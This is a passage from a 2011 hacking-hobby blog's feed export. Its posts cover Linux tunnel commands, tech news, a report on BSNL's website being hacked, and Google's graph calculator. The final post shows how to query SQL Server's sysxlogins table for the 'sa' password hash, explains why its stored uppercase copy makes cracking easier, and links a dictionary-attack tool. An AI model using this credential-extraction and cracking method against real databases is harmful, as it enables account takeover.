&lt;strong&gt;Deprecated iptunnel commands&lt;/strong&gt;&lt;/h3&gt;
&lt;/th&gt;
&lt;th&gt;&lt;h3&gt;

&lt;strong&gt;Replacement&lt;br /&gt;
&lt;/strong&gt;&lt;/h3&gt;
&lt;/th&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iptunnel [add | change | del | show]&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip tunnel a&lt;/strong&gt; or &lt;strong&gt;add&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;ip tunnel chg&lt;/strong&gt; or &lt;strong&gt;change&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;ip tunnel d&lt;/strong&gt; or &lt;strong&gt;del&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;ip tunnel ls&lt;/strong&gt; or &lt;strong&gt;show&lt;br /&gt;
&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iptunnel add&amp;nbsp;[name] [mode {ipip | gre | sit} ] remote [remote_addr] local [local_addr]&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;ip tunnel add [name] [mode {ipip | gre | sit | isatap | ip6in6 | ipip6 | any }] remote [remote_addr] local [local_addr]&lt;/strong&gt;&lt;strong&gt;&lt;/strong&gt;&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td style="padding: 5px;"&gt;&lt;strong&gt;iptunnel -V&lt;/strong&gt; or &lt;strong&gt;–version&lt;/strong&gt;&lt;/td&gt;
&lt;td style="padding: 5px;"&gt;not apparent&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
.&lt;br /&gt;
The syntax between &lt;strong&gt;iptunnel&lt;/strong&gt; and &lt;strong&gt;ip tunnel&lt;/strong&gt; is very similar as these examples show.&lt;br /&gt;
&lt;strong&gt;&lt;strong&gt;#&amp;nbsp; &lt;/strong&gt;[iptunnel | ip tunnel] add ipip-tunl1 mode ipip remote 83.240.67.86&lt;/strong&gt; (&lt;em&gt;ipip-tunl1&lt;/em&gt; is the name of the tunnel, 83.240.67.86 is the IP address of the remote endpoint).&lt;br /&gt;
&lt;strong&gt;&lt;strong&gt;#&amp;nbsp; &lt;/strong&gt;[iptunnel | ip tunnel] add ipi-tunl2 mode ipip remote 104.137.4.160 local 104.137.4.150 ttl 1&lt;/strong&gt;&lt;br /&gt;
&lt;strong&gt;&lt;strong&gt;#&amp;nbsp; &lt;/strong&gt;[iptunnel | ip tunnel] add gre-tunl1 mode gre remote 192.168.22.17 local 192.168.10.21 ttl 255&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.hackplanet.in/2011/12/replacements-for-linux-commands-part-2.html" target="_blank"&gt;&lt;span style="font-size: large;"&gt;Click here for the Next Part : Part 2&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;
&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-3866636474287988005?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/3866636474287988005/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/12/linux-commands-which-can-be-replaced.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/3866636474287988005?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/3866636474287988005?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/12/linux-commands-which-can-be-replaced.html' title='Replacements for Linux Commands : Part 1'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://2.bp.blogspot.com/-ce-h6fud9KU/Tv_TOB3raTI/AAAAAAAAA_0/U3rSdoD03U8/s72-c/HNY.jpg' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;D04HRnc5eip7ImA9WhRQE0s.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-6125693347123516730</id><published>2011-12-08T09:30:00.001-08:00</published><updated>2011-12-08T09:38:57.922-08:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-12-08T09:38:57.922-08:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='HackNews'/><title>9 Suggestions which Apple gave to Samsung</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://socialbarrel.com/wp-content/uploads/2011/09/samsung-apple-patent-lawsuit.jpg?98c14d" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://socialbarrel.com/wp-content/uploads/2011/09/samsung-apple-patent-lawsuit.jpg?98c14d" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class="fullpost"&gt;Well, yeah i warmly accept that this time i am writing rubbish, but after looking at this, i cnt stop myself to blog it out.&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
Saturday, &lt;a href="http://www.theverge.com/2011/12/2/2596527/apple-samsung-design-patent-iphone-ipad-work-around"&gt;The Verge reported&lt;/a&gt;
 that Apple, in their usual arrogant way, felt they needed to tell 
Samsung how to design their devices. The list is quite humorous and 
completely outrageous.&lt;br /&gt;
Apple has told Samsung that, in order not to infringe on their design, Samsung should create a design with:&lt;br /&gt;
&lt;ul&gt;
&lt;li&gt;Display screens that aren't centered on the front face and have substantial lateral borders.&lt;/li&gt;
&lt;li&gt;No front bezel at all.&lt;/li&gt;
&lt;li&gt;Non-horizontal speaker slots.&lt;/li&gt;
&lt;li&gt;Thick frames rather than a thin rim around the front surface.&lt;/li&gt;
&lt;li&gt;Profiles that aren't thin.&lt;/li&gt;
&lt;li&gt;Front surface that isn't black.&lt;/li&gt;
&lt;li&gt;Overall shape that isn't rectangular, or doesn't have rounded corner.&lt;/li&gt;
&lt;li&gt;Front surfaces with substantial adornment.&lt;/li&gt;
&lt;li&gt;Cluttered appearance.&lt;/li&gt;
&lt;/ul&gt;
&amp;nbsp;&lt;i&gt;It must be however be noted that Apple's Ipad never followed a perfect tablet PC's design. In order to gain maximum profits, they made it all the simplest and ignored the actual path for making a Tablet.&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&lt;br /&gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;Instead of improving their work, they are suggesting Samsung people. LOL. :D&lt;/i&gt;&lt;i&gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-6125693347123516730?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/6125693347123516730/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/12/9-suggestions-which-apple-gave-to.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/6125693347123516730?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/6125693347123516730?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/12/9-suggestions-which-apple-gave-to.html' title='9 Suggestions which Apple gave to Samsung'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;Ck8DQ3YzcSp7ImA9WhRQEUo.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-1891787697583222696</id><published>2011-12-06T03:26:00.001-08:00</published><updated>2011-12-06T03:27:52.889-08:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-12-06T03:27:52.889-08:00</app:edited><title>BSNL's Website Hacked again</title><content type='html'>&lt;span class="fullpost"&gt;

&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://blog.itechtalk.com/wp-content/2009/03/bsnl-logo-274x300.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://blog.itechtalk.com/wp-content/2009/03/bsnl-logo-274x300.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;
In a shocking revelation, it has been claimed that the official 
website of Bharat Sanchar Nigam Limited (BSNL) has been hacked by some 
spurious group from Pakistan. This is yet another attempt from the 
Pakistan Cyber Army as a dummy test to ensure that the government 
organization has still loopholes existent and there is a need to ramp up
 the cyber security.&lt;br /&gt;
&lt;br /&gt;

It has been confirmed that personal details of the subscribers, 
including names email addresses and phone numbers have been hacked by 
the group, however, any foul play so far has been denied by them. It 
came to notice at 2:21 am on December 4th, 2011, that such details have 
been hacked by the group. There are five members involved in the group 
namely -c0p, nginx-adm1n, enc0der, k3rnel and sm0ky, though the real 
identity has not been revealed.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-1891787697583222696?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/1891787697583222696/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/12/bsnls-website-hacked-again.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/1891787697583222696?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/1891787697583222696?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/12/bsnls-website-hacked-again.html' title='BSNL&apos;s Website Hacked again'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;DE4DRHYyfip7ImA9WhRQEUo.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-7137825418464428698</id><published>2011-12-06T03:20:00.001-08:00</published><updated>2011-12-06T05:09:35.896-08:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-12-06T05:09:35.896-08:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='News'/><title>World's First Android 4.0 Launched from China Market : Ice Cream Sandwich Tablet</title><content type='html'>&lt;br /&gt;
&lt;div style="text-align: center;"&gt;
&lt;img alt="" class="size-full wp-image-12058 aligncenter" height="191" src="http://9to5google.files.wordpress.com/2011/12/screen-shot-2011-12-05-at-7-43-09-pm.png?w=657&amp;amp;h=316" title="Screen Shot 2011-12-05 at 7.43.09 PM" width="400" /&gt;&lt;/div&gt;
&lt;br /&gt;
There is no shortage of cheap Android tablets from Chinese 
manufacturers that can be found for under $200 online, most of which are
 running an older version of Android and don’t have Google’s blessing 
(meaning no Google services and Market). MIPS Technologies and Ingenic 
Semiconductor announced today availability of the world’s first Ice 
Cream Sandwich, Android 4.0-powered tablet, and it just so happens to a 
$99 budget-friendly tab with decent specs.&lt;br /&gt;
&lt;br /&gt;
The tablet will pack in a 1GHz MIPS-based ‘XBurst” CPU, 7-inch 
capacitive touchscreen, microSD, HDMI 1.3, WiFi 802.11 b/g/n, USB 2.0, 
2-megapixel main cam, front-facing cam, and bluetooth. &lt;a href="http://www.ainovo.com/"&gt;Ainovo&lt;/a&gt;,
 the company offering up the tablet to the Chinese market, is promising 
30 hours standby and 8 hours video playback for battery.&lt;br /&gt;
&lt;br /&gt;
The Novo7 will become available to the US market (likely with 
different branding) through other companies including OMG Electronics 
Ltd. and Leader International Inc. at a later date. There will also be 8
 and 9-inch variants released in the future, mostly likely depending on 
the success of the 7-inch model. You might have to pay a little more 
than the US $99 price tag to get it shipped from a Chinese supplier 
before it lands stateside, but it will probably be your first chance to 
get your hands on an ICS tablet if you do.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;span class="fullpost"&gt;

&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-7137825418464428698?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/7137825418464428698/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/12/worlds-first-android-40-launched-from.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/7137825418464428698?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/7137825418464428698?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/12/worlds-first-android-40-launched-from.html' title='World&apos;s First Android 4.0 Launched from China Market : Ice Cream Sandwich Tablet'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;CkIMR3k7fSp7ImA9WhRQEUo.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-4522442674148548304</id><published>2011-12-05T23:49:00.001-08:00</published><updated>2011-12-06T03:23:06.705-08:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-12-06T03:23:06.705-08:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='News'/><category scheme='http://www.blogger.com/atom/ns#' term='HackNews'/><category scheme='http://www.blogger.com/atom/ns#' term='Google Tricks'/><title>Google Graph Calculator : Use Google as a Graphics Calculator</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://webscopia.com/wp-content/uploads/2011/06/Google.plus-get-an-invite-from-me.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="296" src="http://webscopia.com/wp-content/uploads/2011/06/Google.plus-get-an-invite-from-me.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class="fullpost"&gt;Having learned a lot about Google's power with Google dorks, this time we came up with something cool which Google again offers and can be damn useful, specially to those who work on graphs etc a a lot. This is one of the latest Google's feature.&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;Yeah, u guessed it right. Its just about a simple query which you can hit to get a graphical output and that too mathematically.&amp;nbsp;&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;So here we go.&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;The first demo case i am writing for Engineers [ as i studied with them and then eventually got my stream apart from those]. Lets write a simple Sin(x) function.&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;Simple Functions &lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;x/2, (x/3)^2&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-T7odAhvS8hk/Tt3OUg_sNlI/AAAAAAAAA7o/areZJh-aq54/s1600/s.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="286" src="http://4.bp.blogspot.com/-T7odAhvS8hk/Tt3OUg_sNlI/AAAAAAAAA7o/areZJh-aq54/s400/s.PNG" width="400" /&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;Trignometric Functions&amp;nbsp; &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span class="fullpost"&gt;sin(x)+1/2 sin(2x)+2/3 sin(3x)&amp;nbsp; &lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-sppHj5FTHOA/Tt3LCMVy2NI/AAAAAAAAA7Q/SKdnjBzvWoI/s1600/111.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="288" src="http://2.bp.blogspot.com/-sppHj5FTHOA/Tt3LCMVy2NI/AAAAAAAAA7Q/SKdnjBzvWoI/s400/111.PNG" width="400" /&gt;&amp;nbsp;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
Sin(x), Cos(x), Tan(x)&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: left;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://4.bp.blogspot.com/-vT1nI3IDBTs/Tt3PQXL4MVI/AAAAAAAAA7w/PpSYTNrzLW0/s1600/aaaaaa.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="255" src="http://4.bp.blogspot.com/-vT1nI3IDBTs/Tt3PQXL4MVI/AAAAAAAAA7w/PpSYTNrzLW0/s400/aaaaaa.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;/div&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;Exponential Function&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;(exp(x)-exp(-x))/2&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-CE4FWe8hijE/Tt3M-hcy1YI/AAAAAAAAA7Y/tCFcF2FaCOc/s1600/x.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="263" src="http://1.bp.blogspot.com/-CE4FWe8hijE/Tt3M-hcy1YI/AAAAAAAAA7Y/tCFcF2FaCOc/s400/x.PNG" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;There are many other operations which can give you some appropriate output as per your requirement.&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;And the best part lies in the fact that &lt;/span&gt;"You can zoom in and out and pan across the plane to explore the 
function in more detail. You can also draw multiple functions by 
separating them with commas, "This 
feature covers an extensive range of single variable functions including
 trigonometric, exponential, logarithmic and their compositions, and is 
available in modern browsers".&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
You can also use Google Chart API Calculator developed by Jon Winstanley. Here is the link : &lt;a href="http://www.jonwinstanley.com/charts/%20" target="_blank"&gt;http://www.jonwinstanley.com/charts/ &lt;/a&gt;&lt;br /&gt;
&lt;span class="fullpost"&gt;&lt;br /&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/5015567148035666316-4522442674148548304?l=hackton.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackton.blogspot.com/feeds/4522442674148548304/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://hackton.blogspot.com/2011/12/use-google-as-graphic-calculator.html#comment-form' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/4522442674148548304?v=2'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/5015567148035666316/posts/default/4522442674148548304?v=2'/><link rel='alternate' type='text/html' href='http://hackton.blogspot.com/2011/12/use-google-as-graphic-calculator.html' title='Google Graph Calculator : Use Google as a Graphics Calculator'/><author><name>Shubham Mittal</name><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='24' height='32' src='http://4.bp.blogspot.com/-3jlnVekevSo/TyjxQ-R-auI/AAAAAAAABCM/7RfqLdCZP74/s220/Image0098.jpg'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/-T7odAhvS8hk/Tt3OUg_sNlI/AAAAAAAAA7o/areZJh-aq54/s72-c/s.PNG' height='72' width='72'/><thr:total>0</thr:total></entry><entry gd:etag='W/&quot;CkEFQX89cSp7ImA9WhRQEUo.&quot;'><id>tag:blogger.com,1999:blog-5015567148035666316.post-5382877040847161641</id><published>2011-12-05T09:16:00.001-08:00</published><updated>2011-12-06T03:23:30.169-08:00</updated><app:edited xmlns:app='http://www.w3.org/2007/app'>2011-12-06T03:23:30.169-08:00</app:edited><category scheme='http://www.blogger.com/atom/ns#' term='HackingZone'/><title>How to crack SQL Server's password Hashes</title><content type='html'>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://www.melloandjune.com/wp-content/uploads/2011/06/logo_sql.gif" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="225" src="http://www.melloandjune.com/wp-content/uploads/2011/06/logo_sql.gif" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;
SQL Server uses an undeclared and undocumented function, &lt;b&gt;pwdencrypt()&lt;/b&gt; to
produce a hash of the user's password, which is stored in the sysxlogins table
of the master database. I guess this is a common known thing which most of the
people related to SQL knows. But i never met any article detailing this
function. So here i am focusing on the details of this password hash so as to
further get deeper with it.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;So lets begin with how it looks like.&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;Using Query Analyzer, or the SQL tool of your
choice, run the following query :&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;b style="color: blue;"&gt;select password from master.dbo.sysxlogins where name='sa'&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;
You should get something that looks similar to the following returned.&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;
&lt;b style="color: blue;"&gt;0x01008D504D65431D6F8AA7AED333590D7DB1863CBFC98186BFAE06EB6B327EFA&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b style="color: blue;"&gt;5449E6F649BA954AFF4057056D9B&lt;/b&gt;&lt;br /&gt;
&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;This is the hash of the 'sa' login's password
on my machine.&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;Now there is a uniqueness in this password
hashing function. It would give you two different password hashes for the same
password if you put some difference in their time. Design for this password
hash function is made something like if two people use same password then their
hashes will be different – thus would misinterpret you that password is the
same. &amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp; &lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;Now lets run a case scenario and then lets
study it. Here I am gonna take &lt;b&gt;AAAAAA&lt;/b&gt; as the password ad then lets take
a Hash on it using :&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;div style="color: blue;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;Select pwndecrypt(‘AAAAAA’)&amp;nbsp;&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;Which produces hash&amp;nbsp;&lt;/span&gt;&lt;br /&gt;
&lt;div style="color: blue;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="color: blue; font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;0x01008444930543174C59CC918D34B6A12C9CC9EF99C4769F819B43174C59CC918D34B6A&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;div style="color: blue;"&gt;
&lt;span style="font-size: small;"&gt;&lt;b&gt;12C9CC9EF99C4769F819B&lt;/b&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="color: black; font-size: small;"&gt;The key point here is there are
two password hashes here and these has been concatenated for some advancd
security measure. However luck lies in the fact that we ca crack them separately
as well. &amp;nbsp;This has actually do have 4
parts :&lt;/span&gt;&lt;/div&gt;
&lt;ul style="color: blue;"&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;1&lt;/b&gt;&lt;b&gt;0x0100 &lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;2&lt;/b&gt;&lt;b&gt;84449305 &lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;3&lt;/b&gt;&lt;b&gt;43174C59CC918D34B6A12C9CC9EF99C4769F819B&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;li&gt;&lt;span style="font-size: small;"&gt;&lt;b&gt;43174C59CC918D34B6A12C9CC9EF99C4769F819B&lt;/b&gt;&lt;/span&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="color: black; font-size: small;"&gt;As you can see 3&lt;sup&gt;rd&lt;/sup&gt; and 4&lt;sup&gt;th&lt;/sup&gt; parts
are identical [same] which proves that the password is always stored twice. One
of them is normal case sensitive password [which is originally provided] and
the other one is upper case version of the same password. This is seriously
concerning as anyone attempting to attack the hash had got his work reduced by
Half. Moreover, he do not have to give any “case perms [Random caps lock
sequences]” rather he can simply use Upper characters which will reduce the
keyspace required for the same.&amp;nbsp;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="color: black; font-size: small;"&gt;Here I am attaching the link for a simple command line
dictionary attack tool.&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: inherit;"&gt;
&lt;span style="font-size: small;"&gt;&lt;a href="http://pastebin.com/muDp7BU7" target="_blank"&gt;&lt;span style="color: black;"&gt;Click here to get the code.&lt;/span&gt;&lt;/a&gt;&lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
